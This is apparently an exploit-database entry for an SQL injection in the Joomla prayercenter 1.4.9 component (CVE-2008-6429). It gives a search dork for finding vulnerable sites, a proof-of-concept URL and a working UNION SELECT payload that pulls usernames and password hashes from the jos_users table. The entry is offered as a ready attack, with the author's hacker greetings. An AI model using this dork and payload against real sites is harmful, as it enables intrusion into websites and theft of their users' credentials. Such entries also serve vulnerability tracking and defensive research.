Joomla! Component prayercenter 1.4.9 - 'id' SQL Injection
Author: His0k4
type: webapps
platform: php
port:
date_added: 2008-05-30
date_updated: 2016-12-01
verified: 1
codes: OSVDB-45856;CVE-2008-6429
tags:
aliases:
screenshot_url:
application_url:
/---------------------------------------------------------------\
\ /
/ Joomla Component prayercenter Remote SQL injection \
\ /
\---------------------------------------------------------------/
[*] Author : His0k4 [ALGERIAN HaCkEr]
[*] Dork : inurl:"com_prayercenter"
[*] POC : http://localhost/[Joomla_Path]/index2.php?option=com_prayercenter&task=view_request&id={SQL}
[*] Example : http://localhost/[Joomla_Path]/index2.php?option=com_prayercenter&task=view_request&id=-1 UNION SELECT user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users--
[*] Note : Sometimes you need to register for doing this exploit
----------------------------------------------------------------------------
[*] Greetings : Str0ke, all friends & muslims HaCkeRs...
[*] Greetings2 : http://www.palcastle.org/cc
# milw0rm.com [2008-05-31]